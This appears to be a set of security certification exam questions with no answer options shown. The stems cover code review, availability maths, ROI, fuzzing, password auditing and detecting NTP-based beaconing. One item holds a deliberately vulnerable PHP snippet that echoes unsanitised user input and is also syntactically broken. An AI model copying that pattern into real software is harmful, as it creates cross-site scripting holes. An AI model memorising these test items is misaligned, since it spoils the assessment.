A firm’s Chief Executive Officer (CEO) is concerned that its IT staff lacks the knowledge to identify
complex vulnerabilities that may exist in the payment system being internally developed. The
payment system being developed will be sold to a number of organizations and is in direct
competition with another leading product. The CEO highlighted, in a risk management meeting
that code base confidentiality is of upmost importance to allow the company to exceed the
competition in terms of product reliability, stability and performance. The CEO also highlighted that
company reputation for secure products is extremely important. Which of the following will provide
the MOST thorough testing and satisfy the CEO’s requirements?

The security manager is in the process of writing a business case to replace a legacy secure web
gateway so as to meet an availability requirement of 99.9% service availability. According to the
vendor, the newly acquired firewall has been rated with an MTBF of 10,000 hours and has an
MTTR of 2 hours. This equates to 1.75 hours per year of downtime. Based on this, which of the
following is the MOST accurate statement?

There have been some failures of the company’s customer-facing website. A security engineer
has analyzed the root cause to be the WAF. System logs show that the WAF has been down for
14 total hours over the past month in four separate situations. One of these situations was a two
hour scheduled maintenance activity aimed to improve the stability of the WAF. Which of the
following is the MTTR, based on the last month’s performance figures?

What of the following vulnerabilities is present in the below source code file named
‘AuthenticatedArea.php’?
<html><head><title>AuthenticatedArea</title></head>
<?
include (“/inc/common.php”);
$username = $_REQUEST[‘username’];
if ($username != “”) {
echo “Your username is: “ . $_REQUEST[‘username’];
}else {
header)(“location: /login.php”

}
?>
</html>

To support a software security initiative business case, a project manager needs to provide a cost
benefit analysis. The project manager has asked the security consultant to perform a return on
investment study. It has been estimated that by spending $300,000 on the software security
initiative, a 30% savings in cost will be realized for each project. Based on an average of 8
software projects at a current cost of $50,000 each, how many years will it take to see a positive
ROI?

During user acceptance testing, the security administrator believes to have discovered an issue in
the login prompt of the company’s financial system. While entering the username and password,
the program crashed and displayed the system command prompt. The security administrator
believes that one of the fields may have been mistyped and wants to reproduce the issue to report
it to the software developers. Which of the following should the administrator use to reproduce the
issue?

A security administrator wants to perform an audit of the company password file to ensure users
are not using personal information such as addresses and birthdays as part of their password. The
company employs 200,000 users, has virtualized environments with cluster and cloud-based
computing resources, and enforces a minimum password length of 14 characters. Which of the
following options is BEST suited to run the password auditing software and produce a report in the
SHORTEST amount of time?

The network administrator has been tracking the cause of network performance problems and
decides to take a look at the internal and external router stats.

Which of the following should the network administrator do to resolve the performance issue after
analyzing the above information?

The security administrator at ‘company.com’ is reviewing the network logs and notices a new UDP
port pattern where the amount of UDP port 123 packets has increased by 20% above the
baseline. The administrator runs a packet capturing tool from a server attached to a SPAN port
and notices the following.
UDP 192.168.0.1:123 -> 172.60.3.0:123
UDP 192.168.0.36:123 -> time.company.com
UDP 192.168.0.112:123 -> 172.60.3.0:123
UDP 192.168.0.91:123 -> time.company.com
UDP 192.168.0.211:123 -> 172.60.3.0:123
UDP 192.168.0.237:123 -> time.company.com
UDP 192.168.0.78:123 -> 172.60.3.0:123
The corporate HIPS console reports an MD5 hash mismatch on the svchost.exe file of the
following computers:
192.168.0.1
192.168.0.112
192.168.0.211
192.168.0.78
Which of the following should the security administrator report to upper management based on the
above output?

A mid-level company is rewriting its security policies and has halted the rewriting progress
because the company’s executives believe that its major vendors, who have cultivated a strong
personal and professional relationship with the senior level staff, have a good handle on
compliance and regulatory standards. Therefore, the executive level managers are allowing
vendors to play a large role in writing the policy. Having experienced this type of environment in
previous positions, and being aware that vendors may not always put the company’s interests first,
the IT Director decides that while vendor support is important, it is critical that the company writes
the policy objectively. Which of the following is the recommendation the IT Director should present
to senior staff?